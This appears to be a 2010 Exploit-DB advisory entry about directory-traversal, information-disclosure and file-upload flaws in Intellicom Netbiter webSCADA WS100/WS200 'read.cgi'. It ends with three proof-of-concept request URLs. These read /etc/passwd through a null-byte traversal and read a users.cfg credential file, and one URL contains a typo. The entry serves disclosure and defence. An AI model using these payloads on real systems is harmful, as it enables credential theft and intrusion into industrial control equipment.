Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities

2010-10-01T00:00:00
ID EDB-ID:34794
Type exploitdb
Reporter Eugene Salov
Modified 2010-10-01T00:00:00

Description

Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/43636/info

Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or obtain sensitive data that can aid in further attacks.

Netbiter webSCADA WS100 and Netbiter webSCADA WS200 are vulnerable; other versions may also be affected.

http://www.example.com/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
http://www.example.com/gi-bin/read.cgi?file=/home/config/users.cfg
http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2